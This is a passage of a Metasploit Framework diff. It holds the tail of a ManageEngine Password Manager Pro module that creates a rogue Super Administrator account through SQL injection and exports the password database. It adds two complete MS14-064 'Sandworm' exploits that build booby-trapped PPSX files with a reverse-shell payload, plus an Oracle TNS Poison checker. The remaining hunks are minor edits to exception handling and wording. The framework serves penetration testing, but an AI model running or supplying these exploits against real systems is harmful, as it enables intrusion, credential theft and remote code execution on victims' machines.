+      fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate.")
+    end
+
+    creds = inject_sql(version < 7000 ? true : false)
+    username = creds[0]
+    password = creds[1]
+    print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}")
+
+    cookie_su = login(username, password)
+
+    if cookie_su.nil?
+      fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.")
+    end
+
+    print_status("#{peer} - Reporting Super Administrator credentials...")
+    report_super_admin_creds(username, password)
+
+    print_status("#{peer} - Leaking Password database...")
+    loot_passwords(cookie_su)
+  end
+
+  def report_super_admin_creds(username, password)
+    status = Metasploit::Model::Login::Status::SUCCESSFUL
+
+    service_data = {
+        address: rhost,
+        port: rport,
+        service_name: 'https',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+        origin_type: :service,
+        module_fullname: self.fullname,
+        private_type: :password,
+        private_data: username,
+        username: password
+    }
+
+    credential_data.merge!(service_data)
+    credential_core = create_credential(credential_data)
+    login_data = {
+        core: credential_core,
+        access_level: 'Super Administrator',
+        status: status,
+        last_attempted_at: DateTime.now
+    }
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+
+  def loot_passwords(cookie_admin)
+    # 1st we turn on password exports
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'),
+      'cookie' => cookie_admin,
+      'vars_post'  => {
+        'IS_XLS'         => 'true',
+        'includePasswd'  => 'true',
+        'HOMETAB'        => 'true',
+        'RESTAB'         => 'true',
+        'RGTAB'          => 'true',
+        'PASSWD_RULE'    => 'Offline Password File',
+        'LOGOUT_TIME'    => '20'
+      }
+    })
+
+    # now get the loot!
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'),
+      'cookie' => cookie_admin,
+      'vars_get' => {
+        'RequestType' => 'ExportResources'
+      }
+    })
+
+    if res && res.code == 200 && res.body && res.body.to_s.length > 0
+      vprint_line(res.body.to_s)
+      print_good("#{peer} - Successfully exported password database from Password Manager Pro.")
+      loot_name     = 'manageengine.passwordmanagerpro.password.db'
+      loot_type     = 'text/csv'
+      loot_filename = 'manageengine_pmp_password_db.csv'
+      loot_desc     = 'ManageEngine Password Manager Pro Password DB'
+      p = store_loot(
+          loot_name,
+          loot_type,
+          rhost,
+          res.body,
+          loot_filename,
+          loot_desc)
+      print_status("#{peer} - Password database saved in: #{p}")
+    else
+      print_error("#{peer} - Failed to export Password Manager Pro passwords.")
+    end
+  end
+end

modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb

@@ -18,10 +18,10 @@ class Metasploit3 < Msf::Auxiliary
         Selecting all of the logins from the master..syslogins table is restricted to sysadmins.
         However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server
         logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is
-        pretty simple, because the principal ids assigned to logins are incremental.  Once logins
+        pretty simple, because the principal IDs assigned to logins are incremental.  Once logins
         have been enumerated they can be verified via sp_defaultdb error analysis. This is
-        important, because not all of the principal ids resolve to SQL logins.  Some resolve to
-        roles etc. Once logins have been enumerated they can be used in dictionary attacks.
+        important, because not all of the principal IDs resolve to SQL logins (some resolve to
+        roles instead). Once logins have been enumerated, they can be used in dictionary attacks.
       },
       'Author'      => ['nullbind <scott.sutherland[at]netspi.com>'],
       'License'     => MSF_LICENSE,

modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb

@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
       'Name'        => 'Microsoft SQL Server - Escalate EXECUTE AS',
       'Description' => %q{
         This module can be used escalate privileges if the IMPERSONATION privilege has been
-        assigned to the user. In most cases this results in additional data access, but in
+        assigned to the user. In most cases, this results in additional data access, but in
         some cases it can be used to gain sysadmin privileges.
       },
       'Author'      => ['nullbind <scott.sutherland[at]netspi.com>'],

modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb

@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
       'Name'           => 'Microsoft SQL Server - SQLi Escalate Execute As',
       'Description'    => %q{
         This module can be used escalate privileges if the IMPERSONATION privilege has been
-        assigned to the user via error based SQL injection.  In most cases this results in
+        assigned to the user via error based SQL injection.  In most cases, this results in
         additional data access, but in some cases it can be used to gain sysadmin privileges.
         The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--
       },

modules/auxiliary/gather/eventlog_cred_disclosure.rb

@@ -19,8 +19,8 @@ class Metasploit3 < Msf::Auxiliary
         allow an unauthenticated user to obtain the superuser password of any managed Windows and
         AS/400 hosts. This module abuses both vulnerabilities to collect all the available
         usernames and passwords. First the agentHandler servlet is abused to get the hostid and
-        slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames
-        and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7
+        slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
+        and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
         the TARGETURI has to be prepended with /event.
       },
       'Author' =>

modules/auxiliary/gather/xerox_pwd_extract.rb

@@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary
     begin
       connect(true, 'RPORT' => jport)
       sock.put(create_print_job)
-    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
       print_error("#{rhost}:#{jport} - Error connecting to #{rhost}")
     ensure
       disconnect
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
       res = sock.get_once || ''
       passwd = res.match(/\r\n\s(.+?)\n/)
       return passwd ? passwd[1] : ''
-    rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse, EOFError
+    rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, ::EOFError
       print_error("#{rhost}:#{jport} - Error getting password from #{rhost}")
       return
     ensure
@@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
     begin
       connect(true, 'RPORT' => jport)
       sock.put(remove_print_job)
-    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
       print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}")
     ensure
       disconnect

modules/auxiliary/scanner/oracle/tnspoison_checker.rb

@@ -0,0 +1,52 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::TNS
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Oracle TNS Listener Checker',
+      'Description'    => %q{
+        This module checks the server for vulnerabilities like TNS Poison.
+        Module sends a server a packet with command to register new TNS Listener and checks
+        for a response indicating an error. If the registration is errored, the target is not
+        vulnearble. Otherwise, the target is vulnerable to malicious registrations.
+      },
+      'Author'         => ['ir0njaw (Nikita Kelesis) <nikita.elkey[at]gmail.com>'], # of Digital Security [http://dsec.ru]
+      'References'     =>
+        [
+          [ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ],
+        ],
+      'DisclosureDate' => 'Apr 18 2012',
+      'License'        => MSF_LICENSE))
+
+    register_options(
+      [
+        Opt::RPORT(1521)
+      ], self.class)
+
+    deregister_options('RHOST') # Provided by the TNS mixin, but not needed in a scanner module
+  end
+
+  def run_host(ip)
+    begin
+      connect
+      send_packet = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))")
+      sock.put(send_packet)
+      packet = sock.read(100)
+      find_packet = packet.include? "(ERROR_STACK=(ERROR="
+      find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable")
+      #TODO: Module should report_vuln if this finding is solid.
+      rescue ::Rex::ConnectionError, ::Errno::EPIPE
+      print_error("#{ip}:#{rport} unable to connect to the server")
+    end
+  end
+end

modules/auxiliary/scanner/rservices/rexec_login.rb

@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary
     begin
       sd = Rex::Socket.create_tcp_server('LocalPort' => stderr_port)
 
-    rescue Rex::AddressInUse
+    rescue Rex::BindFailed
       # Ignore and try again
 
     end

modules/auxiliary/scanner/rservices/rsh_login.rb

@@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary
       begin
         sd = Rex::Socket.create_tcp_server('LocalPort' => lport)
 
-      rescue Rex::AddressInUse
+      rescue Rex::BindFailed
         # Ignore and try again
 
       end

modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb

@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
 
     begin
       transport = Net::SSH::Transport::Session.new(ip, options)
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return :connection_error
     end
 
@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
           :fail
         end
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return :connection_error
     rescue Net::SSH::Disconnect, ::EOFError
       return :success

modules/auxiliary/scanner/ssh/ssh_enumusers.rb

@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         Net::SSH.start(ip, user, opt_hash)
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return :connection_error
     rescue Net::SSH::Disconnect, ::EOFError
       return :success

modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb

@@ -226,7 +226,7 @@ class Metasploit3 < Msf::Auxiliary
 
         ::Timeout.timeout(1) { ssh_socket.close if ssh_socket } rescue nil
 
-      rescue Rex::ConnectionError, Rex::AddressInUse
+      rescue Rex::ConnectionError
         return :connection_error
       rescue Net::SSH::Disconnect, ::EOFError
         return :connection_disconnect

modules/exploits/apple_ios/ssh/cydia_default_ssh.rb

@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         ssh = Net::SSH.start(rhost, user, opts)
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
       print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

modules/exploits/linux/ssh/f5_bigip_known_privkey.rb

@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         ssh_socket = Net::SSH.start(rhost, user, opt_hash)
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
       print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb

@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         ssh_socket = Net::SSH.start(rhost, user, opt_hash)
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return nil
     rescue Net::SSH::Disconnect, ::EOFError
       print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb

@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         ssh_socket = Net::SSH.start(rhost, user, opt_hash)
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return nil
     rescue Net::SSH::Disconnect, ::EOFError
       print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb

@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         ssh = Net::SSH.start(rhost, user, opts)
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return nil
     rescue Net::SSH::Disconnect, ::EOFError
       print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

modules/exploits/linux/ssh/symantec_smg_ssh.rb

@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         ssh = Net::SSH.start(rhost, user, opts)
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
       print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

modules/exploits/multi/http/visual_mining_netcharts_upload.rb

@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
         First, a lack of input validation in the administration console permits
         arbitrary jsp code upload to locations accessible later through the web
         service. Authentication is typically required, however a 'hidden' user is
-        available by default (and non editable). This user, named 'Scheduler',
+        available by default (and non-editable). This user, named 'Scheduler',
         can only login to the console after any modification in the user
         database (a user is added, admin password is changed etc). If the
         'Scheduler' user isn't available valid credentials must be supplied. The

modules/exploits/multi/ssh/sshexec.rb

@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     begin
       self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       fail_with(Failure::Unreachable, 'Disconnected during negotiation')
     rescue Net::SSH::Disconnect, ::EOFError
       fail_with(Failure::Disconnected, 'Timed out during negotiation')

modules/exploits/unix/misc/xerox_mfp.rb

@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
       connect
       sock.put(firmcode)
       handler
-    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
       print_error("#{rhost}:#{rport} - #{e.message}")
     ensure
       disconnect

modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb

@@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         ssh = Net::SSH.start(rhost, user, opts)
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
     rescue Net::SSH::Disconnect, ::EOFError
       fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")

modules/exploits/unix/ssh/tectia_passwd_changereq.rb

@@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         c = do_login(datastore['USERNAME'])
       end
-    rescue Rex::ConnectionError, Rex::AddressInUse
+    rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
       print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"

modules/exploits/windows/fileformat/ms14_064_packager_python.rb

@@ -0,0 +1,152 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
+        allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability
+        publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista
+        SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
+        However, based on our testing, the most reliable setup is on Windows platforms running
+        Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as
+        those using Office 2010 SP1 may be less stable, and may end up with a crash due to a
+        failure in the CPackage::CreateTempFileName function.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Haifei Li', # Vulnerability discovery and exploit technique
+          'sinn3r', # Metasploit module
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-6352'],
+          ['MSB', 'MS14-064'],
+          ['BID', '70690'],
+          ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm']
+        ],
+      'Platform'       => 'python',
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        =>
+        [
+          ['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}],
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' =>
+        {
+          'Payload' => 'python/meterpreter/reverse_tcp'
+        },
+      'DisclosureDate' => "Nov 12 2014",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
+      ], self.class)
+  end
+
+  def exploit
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    payload_packager = create_packager('tabnanny.py', payload.encoded)
+    trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))
+    zip = zip_ppsx(payload_packager, trigger_packager)
+    file_create(zip)
+  end
+
+  def zip_ppsx(ole_payload, ole_trigger)
+    zip_data = {}
+    data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
+
+    Dir["#{data_dir}/**/**"].each do |file|
+      unless File.directory?(file)
+        zip_data[file.sub(data_dir,'')] = File.read(file)
+      end
+    end
+
+    # add the otherwise skipped "hidden" file
+    file = "#{data_dir}/_rels/.rels"
+    zip_data[file.sub(data_dir,'')] = File.read(file)
+
+    # put our own OLE streams
+    zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload
+    zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger
+
+    # create the ppsx
+    ppsx = Rex::Zip::Archive.new
+    zip_data.each_pair do |k,v|
+      ppsx.add_file(k,v)
+    end
+
+    ppsx.pack
+  end
+
+  def create_packager(file_name, contents)
+    file_info = [2].pack('v')
+    file_info << "#{file_name}\x00"
+    file_info << "#{file_name}\x00"
+    file_info << "\x00\x00"
+
+    extract_info = [3].pack('v')
+    extract_info << [file_name.length + 1].pack('V')
+    extract_info << "#{file_name}\x00"
+
+    file = [contents.length].pack('V')
+    file << contents
+
+    append_info = [file_name.length].pack('V')
+    append_info << Rex::Text.to_unicode(file_name)
+    append_info << [file_name.length].pack('V')
+    append_info << Rex::Text.to_unicode(file_name)
+    append_info << [file_name.length].pack('V')
+    append_info << Rex::Text.to_unicode(file_name)
+
+    ole_data = file_info + extract_info + file + append_info
+    ole_contents = [ole_data.length].pack('V') + ole_data
+
+    ole = create_ole("\x01OLE10Native", ole_contents)
+
+    ole
+  end
+
+  def create_ole(stream_name, data)
+    ole_tmp = Rex::Quickfile.new('ole')
+    stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
+
+    stm = stg.create_stream(stream_name)
+    stm << data
+    stm.close
+
+    directory = stg.instance_variable_get(:@directory)
+    directory.each_entry do |entry|
+      if entry.instance_variable_get(:@_ab) == 'Root Entry'
+        # 0003000C-0000-0000-c000-000000000046 # Packager
+        clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
+        entry.instance_variable_set(:@_clsId, clsid)
+      end
+    end
+
+    # write to disk
+    stg.close
+
+    ole_contents = File.read(ole_tmp.path)
+    ole_tmp.close
+    ole_tmp.unlink
+
+    ole_contents
+  end
+
+end
+

modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb

@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
+        allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
+        The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
+        such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
+        to be vulnerable. However, based on our testing, the most reliable setup is on Windows
+        platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other
+        setups such as using Office 2010 SP1 might be less stable, and may end up with a
+        crash due to a failure in the CPackage::CreateTempFileName function.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Haifei Li', # Vulnerability discovery
+          'sinn3r', # Metasploit module
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-6352'],
+          ['MSB', 'MS14-064'],
+          ['BID', '70690'],
+          ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous']
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Oct 21 2014",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
+      ], self.class)
+  end
+
+  def exploit
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    ole_stream = ole_packager
+    zip = zip_ppsx(ole_stream)
+    file_create(zip)
+  end
+
+  def zip_ppsx(ole_stream)
+    zip_data = {}
+    data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-6352', 'template_run_as_admin')
+
+    Dir["#{data_dir}/**/**"].each do |file|
+      unless File.directory?(file)
+        zip_data[file.sub(data_dir,'')] = File.read(file)
+      end
+    end
+
+    # add the otherwise skipped "hidden" file
+    file = "#{data_dir}/_rels/.rels"
+    zip_data[file.sub(data_dir,'')] = File.read(file)
+
+    # put our own OLE streams
+    zip_data['/ppt/embeddings/oleObject1.bin'] = ole_stream
+
+    # create the ppsx
+    ppsx = Rex::Zip::Archive.new
+    zip_data.each_pair do |k,v|
+      ppsx.add_file(k,v)
+    end
+
+    ppsx.pack
+  end
+
+  def ole_packager
+    payload_name = "#{rand_text_alpha(4)}.exe"
+
+    file_info = [2].pack('v')
+    file_info << "#{payload_name}\x00"
+    file_info << "#{payload_name}\x00"
+    file_info << "\x00\x00"
+
+    extract_info = [3].pack('v')
+    extract_info << [payload_name.length + 1].pack('V')
+    extract_info << "#{payload_name}\x00"
+
+    p = generate_payload_exe
+    file = [p.length].pack('V')
+    file << p
+
+    append_info = [payload_name.length].pack('V')
+    append_info << Rex::Text.to_unicode(payload_name)
+    append_info << [payload_name.length].pack('V')
+    append_info << Rex::Text.to_unicode(payload_name)
+    append_info << [payload_name.length].pack('V')
+    append_info << Rex::Text.to_unicode(payload_name)
+
+    ole_data = file_info + extract_info + file + append_info
+    ole_contents = [ole_data.length].pack('V') + ole_data
+
+    ole = create_ole("\x01OLE10Native", ole_contents)
+
+    ole
+  end
+
+  def create_ole(stream_name, data)
+    ole_tmp = Rex::Quickfile.new('ole')
+    stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
+
+    stm = stg.create_stream(stream_name)
+    stm << data
+    stm.close
+
+    directory = stg.instance_variable_get(:@directory)
+    directory.each_entry do |entry|
+      if entry.instance_variable_get(:@_ab) == 'Root Entry'
+        # 0003000C-0000-0000-c000-000000000046 # Packager
+        clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
+        entry.instance_variable_set(:@_clsId, clsid)
+      end
+    end
+
+    # write to disk
+    stg.close
+
+    ole_contents = File.read(ole_tmp.path)
+    ole_tmp.close
+    ole_tmp.unlink
+
+    ole_contents
+  end
+end
+

spec/lib/msf/ui/command_dispatcher/db_spec.rb

@@ -25,7 +25,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
       context "when a core already exists" do
         before(:each) do
           priv = FactoryGirl.create(:metasploit_credential_password, data: password)
-          pub = FactoryGirl.create(:metasploit_credential_public, username: username)
+          pub = FactoryGirl.create(:metasploit_credential_username, username: username)
           core = FactoryGirl.create(:metasploit_credential_core,
                                     origin: FactoryGirl.create(:metasploit_credential_origin_import),
                                     private: priv,